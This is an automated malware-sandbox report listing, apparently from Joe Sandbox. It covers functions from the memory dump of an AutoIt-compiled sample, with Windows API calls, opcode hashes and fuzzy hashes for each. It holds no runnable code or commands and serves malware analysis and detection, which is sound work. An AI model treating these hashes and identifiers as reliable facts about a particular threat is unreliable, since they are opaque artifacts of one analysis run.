                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 7fbeb08b9d1dca0198c6c4ae9a36870aa38de60fd3f4f722344aa5e92e0c893c
                                        • Instruction ID: 512d00bb30092f30a6bbeac8875e5f5a81a0d83eb83bdf3250ce9c5aafb87767
                                        • Opcode Fuzzy Hash: 7fbeb08b9d1dca0198c6c4ae9a36870aa38de60fd3f4f722344aa5e92e0c893c
                                        • Instruction Fuzzy Hash: EE414B31608680BAC7388F2AD8C8B2E7B95BB86314F14443DE09752DF1CA31AAC3DB11
                                        Function 00C82D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00C82D1B
                                        • GetDC.USER32(00000000), ref: 00C82D23
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C82D2E
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C82D3A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C82D76
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C82D87
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C85A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00C82DC2
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C82DE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 986bf417e797c7397ed5af33c4470a39db040a3b7b8305e163a9183198117511
                                        • Instruction ID: 6d7ff37bde81774fb1e3c6d8b32e84d6ef5ab1e1b12b29bae4ce9b432550a372
                                        • Opcode Fuzzy Hash: 986bf417e797c7397ed5af33c4470a39db040a3b7b8305e163a9183198117511
                                        • Instruction Fuzzy Hash: 44317A76201214BFEB219F50DC8AFEB3FA9EF09755F044066FE089A291D6759C50CBB8
                                        Function 00C55622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 898092facbc852fc66fee1efbfc070c5d1f1b55884790ee124b306a3bc54ae45
                                        • Instruction ID: ef18fffc3c52e91dff11e90bc7fd598a3ceab6a1df5e7496faced3730e6e2b9c
                                        • Opcode Fuzzy Hash: 898092facbc852fc66fee1efbfc070c5d1f1b55884790ee124b306a3bc54ae45
                                        • Instruction Fuzzy Hash: 3F213E6574090DB7D21465128DA2FFB335CAF21386F940034FE145A781FF24EF9992AD
                                        Function 00C74FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: b0a882bbabe6b9bcd8e2d70b290c5dde550a2a317d401982bc75c9fffdb03245
                                        • Instruction ID: 54cb728dfe6c96f82b72d4e42268f4af88f8c0b6c2f05ca7d0618acf6e708b47
                                        • Opcode Fuzzy Hash: b0a882bbabe6b9bcd8e2d70b290c5dde550a2a317d401982bc75c9fffdb03245
                                        • Instruction Fuzzy Hash: 4BD1B475A0060A9FDF10CFA8C881BAEB7B5FF48344F14C069E929AB291D7B1DE45CB50
                                        Function 00C31522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C315CE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31651
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C317FB,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C316E4
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C316FB
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31777
                                        • __freea.LIBCMT ref: 00C317A2
                                        • __freea.LIBCMT ref: 00C317AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 2829977744-0
                                        • Opcode ID: 9b303c9d607bd671311163739290bf4932324109a55d6bdaf77fbcd75f5c9f1a
                                        • Instruction ID: e4ad709fb0111c517c2c8c0805e4986b5c9d08cb22235aa028b711cf71839b1d
                                        • Opcode Fuzzy Hash: 9b303c9d607bd671311163739290bf4932324109a55d6bdaf77fbcd75f5c9f1a
                                        • Instruction Fuzzy Hash: 3D918072E202169EDF219FA5C881AEE7BB5EF49710F1C4669EC11E7281DB35DE40CB60
                                        Function 00C74523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2610073882-625585964
                                        • Opcode ID: a7271d65928044dc419e025bb1c2e9b63c32599b50b659db2dc8b12cd63eb88e
                                        • Instruction ID: 73f47110d5d4eb98516ebc5f68d4f7bf1404fb0e990eb9ae3016095e9472a893
                                        • Opcode Fuzzy Hash: a7271d65928044dc419e025bb1c2e9b63c32599b50b659db2dc8b12cd63eb88e
                                        • Instruction Fuzzy Hash: 4A918171A00219ABDF28CFA5C885FAEBBB8EF46714F10C559F519AB280D7709945CFA0
                                        Function 00C61187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C6125C
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61284
                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C612A8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C612D8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C6135F
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C613C4
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C61430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                        • String ID:
                                        • API String ID: 2550207440-0
                                        • Opcode ID: b8742e4c0a0a892e620bf7458b5bd917746ecbf8e80d7e5ac2bbf1114625f8c5
                                        • Instruction ID: 02e21f4ea731c80678ab2340fc5b543dff87d5dace065a8dc081a758eefa0282
                                        • Opcode Fuzzy Hash: b8742e4c0a0a892e620bf7458b5bd917746ecbf8e80d7e5ac2bbf1114625f8c5
                                        • Instruction Fuzzy Hash: 0691E071A00218AFDB20DFA4C8D5BBEB7F5FF45312F194029E911EB291DB74A981DB90
                                        Function 00C0948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: aad63fa12bf724f0efe4a6cbcfcd87bef0b3d5d7ee2ac34cbda9a35df6afed1a
                                        • Instruction ID: 33de031d0b979a5661fe3bc73b4bdf4c2d7fdceae95a212211d0abbf43ecc9a7
                                        • Opcode Fuzzy Hash: aad63fa12bf724f0efe4a6cbcfcd87bef0b3d5d7ee2ac34cbda9a35df6afed1a
                                        • Instruction Fuzzy Hash: F5913871D00219EFCB10CFAACC84AEEBBB8FF49320F148555E515B7292D374AA41DB60
                                        Function 00C73947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00C7396B
                                        • CharUpperBuffW.USER32(?,?), ref: 00C73A7A
                                        • _wcslen.LIBCMT ref: 00C73A8A
                                        • VariantClear.OLEAUT32(?), ref: 00C73C1F
                                          • Part of subcall function 00C60CDF: VariantInit.OLEAUT32(00000000), ref: 00C60D1F
                                          • Part of subcall function 00C60CDF: VariantCopy.OLEAUT32(?,?), ref: 00C60D28
                                          • Part of subcall function 00C60CDF: VariantClear.OLEAUT32(?), ref: 00C60D34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 77db5114ecb02f588de16cb91456abf4d5db5039c3a2d75521dd694b57a7d79a
                                        • Instruction ID: adb8b81d50e4ca93a3c92018d7c0cd44e069f8fa9099509f90d1a23b16c4bbaa
                                        • Opcode Fuzzy Hash: 77db5114ecb02f588de16cb91456abf4d5db5039c3a2d75521dd694b57a7d79a
                                        • Instruction Fuzzy Hash: 0D91A9756083459FCB04EF24C48196AB7E4FF88314F14896EF89A9B351DB30EE49DB92
                                        Function 00C74BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C5000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?,?,00C5035E), ref: 00C5002B
                                          • Part of subcall function 00C5000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50046
                                          • Part of subcall function 00C5000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?,?), ref: 00C50054
                                          • Part of subcall function 00C5000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C4FF41,80070057,?), ref: 00C50064
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C74C51
                                        • _wcslen.LIBCMT ref: 00C74D59
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C74DCF
                                        • CoTaskMemFree.OLE32(?), ref: 00C74DDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 614568839-2785691316
                                        • Opcode ID: cde214d7745ca539f59e36eb48d0787fb24169cc4a0c5e0a71d464b45cafe9a0
                                        • Instruction ID: de00dbfc6e8429762fe16d3da29fa51a0ed7664c7e30f2c7e06f3d417b4f0dd6
                                        • Opcode Fuzzy Hash: cde214d7745ca539f59e36eb48d0787fb24169cc4a0c5e0a71d464b45cafe9a0
                                        • Instruction Fuzzy Hash: CF910871D0021DAFDF14DFA4C891AEEB7B9BF08350F108169E929A7291DB709A49CF60
                                        Function 00C820FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 00C82183
                                        • GetMenuItemCount.USER32(00000000), ref: 00C821B5
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C821DD
                                        • _wcslen.LIBCMT ref: 00C82213
                                        • GetMenuItemID.USER32(?,?), ref: 00C8224D
                                        • GetSubMenu.USER32(?,?), ref: 00C8225B
                                          • Part of subcall function 00C53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53A57
                                          • Part of subcall function 00C53A3D: GetCurrentThreadId.KERNEL32 ref: 00C53A5E
                                          • Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C822E3
                                          • Part of subcall function 00C5E97B: Sleep.KERNEL32 ref: 00C5E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: 9234494aaae292bf86f3df33976b7b56236154dd3dbfdbc760aea7578a51a44f
                                        • Instruction ID: 8f810a80c86e59a21c53407a0ad37da92524480e5730dd5f018addd08a9b17b8
                                        • Opcode Fuzzy Hash: 9234494aaae292bf86f3df33976b7b56236154dd3dbfdbc760aea7578a51a44f
                                        • Instruction Fuzzy Hash: F671B335A00205AFCB10EF64C889AAEB7F5EF48324F108499E926EB351D734EE41DB94
                                        Function 00C5AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 00C5AEF9
                                        • GetKeyboardState.USER32(?), ref: 00C5AF0E
                                        • SetKeyboardState.USER32(?), ref: 00C5AF6F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C5AF9D
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5AFBC
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C5AFFD
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C5B020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: c2896d92cf224cdde281b84a7adc43805a962dd7daf2a4f45746d2e9374be4b4
                                        • Instruction ID: 050338b66a30f8266fe7f5c5109fe5c0cc8df0fd4ce6347b0b3d498bbc8c334c
                                        • Opcode Fuzzy Hash: c2896d92cf224cdde281b84a7adc43805a962dd7daf2a4f45746d2e9374be4b4
                                        • Instruction Fuzzy Hash: 3A5124E46047D13DFB3242348C45BBABEA95B06305F088689F9E8454C2C3E8AECCD369
                                        Function 00C5ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(00000000), ref: 00C5AD19
                                        • GetKeyboardState.USER32(?), ref: 00C5AD2E
                                        • SetKeyboardState.USER32(?), ref: 00C5AD8F
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C5ADBB
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C5ADD8
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C5AE17
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C5AE38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 7ff04b0ceeb27095fde6ab6acf8db965f4b506fa2e86eea3d3ae558fe2559e9e
                                        • Instruction ID: 93647e9558a7e75ea68df42848795edb4f9f3d7b3523a3291ce51cd5299d6367
                                        • Opcode Fuzzy Hash: 7ff04b0ceeb27095fde6ab6acf8db965f4b506fa2e86eea3d3ae558fe2559e9e
                                        • Instruction Fuzzy Hash: 35514AA55047D53DFB3343368C46B7ABEA86B06302F088688E4E5568C2D3D4EDDCD36A
                                        Function 00C2542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(00C33CD6,?,?,?,?,?,?,?,?,00C25BA3,?,?,00C33CD6,?,?), ref: 00C25470
                                        • __fassign.LIBCMT ref: 00C254EB
                                        • __fassign.LIBCMT ref: 00C25506
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00C33CD6,00000005,00000000,00000000), ref: 00C2552C
                                        • WriteFile.KERNEL32(?,00C33CD6,00000000,00C25BA3,00000000,?,?,?,?,?,?,?,?,?,00C25BA3,?), ref: 00C2554B
                                        • WriteFile.KERNEL32(?,?,00000001,00C25BA3,00000000,?,?,?,?,?,?,?,?,?,00C25BA3,?), ref: 00C25584
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 0f324db3544c5d1b084e9c07053d345aba53991f9779500ea87bce9e13b9c9a4
                                        • Instruction ID: 9a4d9c2e762e6928152430dcf1b08d4ddb307982d1eba3bd06a28f96587ce03e
                                        • Opcode Fuzzy Hash: 0f324db3544c5d1b084e9c07053d345aba53991f9779500ea87bce9e13b9c9a4
                                        • Instruction Fuzzy Hash: 7151B3B1A007599FDB10CFA8E885BEEBBF9EF09301F14452AF555E7291D7309A41CB60
                                        Function 00C12D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00C12D4B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00C12D53
                                        • _ValidateLocalCookies.LIBCMT ref: 00C12DE1
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00C12E0C
                                        • _ValidateLocalCookies.LIBCMT ref: 00C12E61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 6f47bc651087d1a37ebad3410d61cbb6e2e50b18ec8ab84c05aebbb9d5a14348
                                        • Instruction ID: 0377b3e1cbbb42c0ba4508a1af24340846566489d4d369b51240a0ba1faf8bb3
                                        • Opcode Fuzzy Hash: 6f47bc651087d1a37ebad3410d61cbb6e2e50b18ec8ab84c05aebbb9d5a14348
                                        • Instruction Fuzzy Hash: 8F41D738E002099FCF10EF68D845ADEBBB5BF46324F148155E8156B392D731EAA5EBD0
